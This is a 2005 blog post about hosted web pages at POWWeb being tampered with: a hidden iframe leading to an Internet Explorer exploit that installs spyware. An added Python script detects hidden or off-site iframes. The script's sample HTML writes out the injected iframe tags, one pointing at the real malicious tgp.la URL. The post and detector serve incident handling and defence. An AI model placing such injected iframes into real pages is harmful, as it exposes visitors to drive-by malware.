Website Hijinks

The fun continues over at POWWeb. A bunch of us have noticed that the home page has had an IFRAME appended at the bottom, calling http://www.tgp.la/or.html. The file change occurred at 2005-05-03 21:34 (-0700).
The tgp.la page is loaded as a web bug (a 0 by 0 pixel frame) on my home page. When I examine what www.tgp.la/or.html does, I see that it loads, via another iframe, http://www.realizeit.biz/v058/wow.html. That HTML page uses an old Internet Explorer exploit to install some spyware known as Trojan.Desktophijack. Some antivirus products already catch it. Symantec wasn’t catching it, so I submitted the file to Symantec. They responded that it is a virus and that they will be adding it to the definitions. Hopefully it makes it into the LiveUpdate due out today.
The question for incident handling is how it happened. With the 404 redirect problem at POWWeb that I reported before, it was fairly easy to prove that it was a POWWeb problem (although they never admitted it). In this case it is much more difficult to prove. The POWWeb fanboys are pointing a finger at the applications we are using (phpnuke, Movable Type, gallery, phpBB, awstats, etc.). Then there is also the possibility that the FTP password was guessed.
There is not one vulnerable package that we all run. I suppose it could be a hybrid worm looking for several vulnerabilities, but I think I would see something like that in my HTTP logs. I’ve reviewed the logs and see nothing of the sort. That leaves me wondering whether my web provider POWWeb hasn’t screwed up again, like they did with the 404 error page problem. Until we figure out what is wrong, there is no way to guarantee that an attacker will not be able to update my page again!
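One practical way to catch this kind of tampering early is to scan your own published pages for iframes that are hidden (0 by 0, or hidden by CSS) or that point at a host other than your own site. The script below is an added example, not code from the original post or from POWWeb; it uses only the Python standard library. The sample HTML is constructed for the example: it contains a legitimate same-site iframe, the 0x0 tgp.la frame described above, and a second, CSS-hidden frame on a placeholder host (injected.invalid) to show that the check generalizes beyond the width/height trick.

```python
"""Flag hidden or off-site iframes in a page: the kind of injection described in
the post (a 0x0 IFRAME appended to the home page, pointing at a third-party host).
Added example, not code from the original post; standard library only."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes and source line."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            attr_map = {k.lower(): (v or "") for k, v in attrs}
            self.iframes.append({"line": self.getpos()[0], "attrs": attr_map})


def _is_zero(value):
    """True for "0", "0px", "0%", "0.0" and similar zero-sized values."""
    return re.match(r"^\s*0+(\.0+)?\s*(px|%)?\s*$", value or "") is not None


def find_suspicious_iframes(html, site_host):
    """Return findings for iframes that are zero-sized, hidden by inline style,
    or whose src points off-site. site_host is the host the page legitimately lives on."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for frame in parser.iframes:
        a = frame["attrs"]
        reasons = []
        if _is_zero(a.get("width")) and _is_zero(a.get("height")):
            reasons.append("zero-size")
        style = a.get("style", "").lower().replace(" ", "")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-by-style")
        src = a.get("src", "")
        host = urlparse(src).hostname  # None for relative URLs
        if host and host.lower() != site_host.lower():
            reasons.append("off-site:" + host)
        if reasons:
            findings.append({"line": frame["line"], "src": src, "reasons": reasons})
    return findings


# Constructed sample: a normal page with a same-site iframe, plus two injected
# frames appended at the bottom. The tgp.la URL is the one from the post; the
# injected.invalid host is a placeholder.
SAMPLE_HTML = """<html><body>
<h1>My site</h1>
<iframe src="/gallery/" width="400" height="300"></iframe>
<p>Legitimate content here.</p>
</body></html>
<iframe src="http://www.tgp.la/or.html" width=0 height=0></iframe>
<iframe src="http://injected.invalid/x.html" style="display: none"></iframe>
"""

if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_HTML, "www.example.com"):
        print("line %d: %s (%s)" % (f["line"], f["src"], ", ".join(f["reasons"])))
```

Run it against a local copy of each published page (or fetch the live page and feed the body in), and treat any finding as a reason to compare the file against a known-good copy and check the FTP and HTTP logs around the file's modification time.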